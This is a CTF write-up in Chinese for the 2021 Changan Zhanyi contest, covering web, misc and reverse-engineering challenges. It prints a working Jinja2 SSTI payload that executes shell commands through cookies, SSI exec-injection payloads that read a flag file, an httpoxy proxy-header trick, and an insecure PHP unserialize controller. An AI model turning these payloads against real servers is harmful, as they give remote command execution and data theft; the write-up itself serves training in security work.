[CTF]2021长安战疫 WP
前言
这次比赛还是挺有意义的。
WEB
flask
url结尾要是.js?
直接放payload
GET /admin?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}&a=.js?
Cookie: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
Baby_upload
过滤了很多,但是没有过滤shtml,考虑ssi注入,先试一下这样,发现ls应该是被过滤了
但是还可以用dir /
来看目录下文件,发现有
app home root start.sh bin lib run sys boot lib64 run.sh tmp create_mysql_admin_user.sh media sbin usr dev mnt srv var etc opt start-apache2.sh fffffflllll11111aaaaa4444ggggg proc start-mysqld.sh
很明显的有flag,但是cat tac nl等等读文件的命令都没了,测了一下还有awk,cut,strings.因为fl
是被过滤了的,可以用?来匹配,所以可以构造如下payload
cut -b 1-100 ffffffllll?11111aaaaa4444ggggg
还可以
<!--#exec cmd="/???/??? /ffffff?llll11111aaaaa4444ggggg" -->
flag配送中心
一个httpproxy的cve,当我们在请求报文的头加上
Proxy:http://ip:port
由于php版本的原因,会自动在Proxy前加上HTTP_,导致漏洞产生,所以只需要加个头,然后在服务器上开启监听即可得到flag
Misc
八卦迷宫
跟着走就行
ezsteg
爆破得到密码220101
题目说了steg,py的隐写,用python stegosaurus.py -x steg.pyc
然后emoji-aes输入密钥即可获得flag
朴实无华的取证
先正常的取证操作
然后
得到图片
爆破flag.zip得到密码20211209
然后得到加密脚本
//幼儿园水平的加密(部分)
void Encrypt(string& str)
{for(int i = 0; i < str.length(); i++){if(str[i] >='a'&& str[i]<='w')str[i]+=3;else if(str[i]=='x')str[i]='a';else if(str[i]=='y')str[i]='b';else if(str[i]=='z')str[i]='c'; else if(str[i]=='_')str[i]='|';str[i] -= 32;}
}
解密
s = b"fdcb[8ldq?zloo?fhuwdlqobvxffhhg?lq?iljkwlqj?wkh?hslghplf]"
s = s.upper()
for c in s:c += 32print(chr(c), end='')
然后凯撒,然后猜出flag
ezencrypt
下载一个流量包,导出对象,一串奇怪的数据,base64之后是zip数据流,然后导出zip
用D盾扫描
应该就是个混淆加密,找网站在线解得到
<?php
namespace app\controller;use app\BaseController;class Index extends BaseController
{public function index(){if(!empty($_GET['pop'])){unserialize(base64_decode($_GET['pop']));}return "Welcom To CAZT! Xi'an Come On!";}public function C4zyC0m3On(){return 'cazy{PHP_ji4m1_1s_s00000_3aSyyyyyyyyyyy}';}
}
?>
西安加油
流量包提取数据secret.txt,base64解密后存为文件,压缩包,要拼图。自动拼图即可
逆向
combat_slogan
jd-gui反编译发现
rot13解得We_w11l_f1ght_t0_end_t0_end_cazy
cute_doge
shift+f12得到ZmxhZ3tDaDFuYV95eWRzX2Nhenl9…
flag{Ch1na_yyds_cazy}
[CTF]2021长安战疫 WP相关推荐
- 长安战疫网络安全卫士守护赛 Shiro?
赛题:Shiro? 需要准备的环境: 反弹shell需要准备VPS.JNDI-Injection-Exploit工具启动rmi和ldap服务 JNDI-Injection-Exploit 需要jdk. ...
- [长安战疫-cazy] Web题解
RCE_No_Para <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_mat ...
- 2021长安“战疫”网络安全卫士守护赛 misc部分writeup
2021长安"战疫"网络安全卫士守护赛 misc部分writeup 八卦迷宫 朴实无华的取证 西安加油 ez_Encrypt 一百多名,我觉得还行欸,多亏了队里的crypto手 八 ...
- 【pwn】2021 鹤壁杯 wp
[pwn]2021 鹤壁杯 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1.ret2libc1 ...
- 2021长三角智能包装产业发展大会
随着消费者对产品包装的要求越来越高,包装生产工艺也在不断进步,各类提高产品包装速度和美观程度的包装机械设备应运而生. 当前高度自动化.高效化.节能化的包装设备已然受到食品.饮料.医药等下游行业青睐,传 ...
- 「从O2O到私域流量」2021长三角(南京)智慧零售大会报名通道开启!
导读 新冠疫情的出现,让传统零售业受到严重冲击,数字化考验着企业的抗风险能力.商业竞争背后的流量争夺战日趋激烈,O2O等传统互联网营销模式面临着流量增加的瓶颈.社交电商.社区团购.短视频直播所聚焦的私 ...
- 辰视冯良炳博士演讲的2021长三角智能包装产业发展大会成功举办!
6月23日下午,由工业技术创新联盟(工创联)联合上海博华国际展览有限公司,ITES深圳工业展.中国传动网协办的[2021长三角智能包装产业发展大会成功举办]. 随着消费者对产品包装质量.外观等要求的提 ...
- 强网杯2021 ctf线上赛ezmath wp(#超详细,带逆向新手走过一个又一个小坑)
文章目录 引言 一.分析文件类型 二.初步分析 1 运行情况 2 IDA初步分析 三.详细分析 1 sub_13F3函数分析 2 查找蛛丝马迹 (1)mprotect (2)重写unk_2010 3 ...
- 2021长郡浏阳中学高考成绩查询,2021长沙市高中排名一览表
2021长沙市高中排名一览表2021-04-15 15:43:40文/董玉莹 高中对于学生的学习是影响很大的,好的高中能提供学生好的学习环境.本文整理了长沙高中排名,来看看长沙都有哪些重点高中. 长沙 ...
最新文章
- JDBC连接MySQL数据库及演示样例
- 用Python解锁“吃鸡”正确姿势
- 在Windows Server 2012中如何快速开关桌面上经典的“计算机、我的文档”等通用图标...
- 数据结构源码笔记(C语言):统计字符串中出现的字符及其次数
- OGEngine_粒子效果
- 知乎大神深入解析:单片机晶振脚原理是什么?
- xadsafe做暗刷_手把手教你如何去掉网吧广告之PUBWin2015_XADSAFE
- React之回调ref中回调执行次数的问题
- 使用TweenMax更方便的创建连续的运动。
- SpringBoot 工程目录 整合mybatis-neo4j(注解类型)
- bzero函数_Poll 函数
- Cocoa 获取一个独特的电脑硬件ID (A unique hardware id)
- JS中动态创建元素的三种方法
- matlab 数据分割,科学网—MATLAB把一个包含多个站点数据的文件分割到各个站点单独的文件夹 - 张乐乐的博文...
- Reference详解
- 使用jquery获取标签的id属性
- flutter 顶部状态栏透明
- openvino下载模型
- nodejs express搭建服务器(爬虫知乎精华帖,个人学习用)四 存储提到的内容的次数
- 第六次:收集分析40个游戏广告(宣传图、落地页等)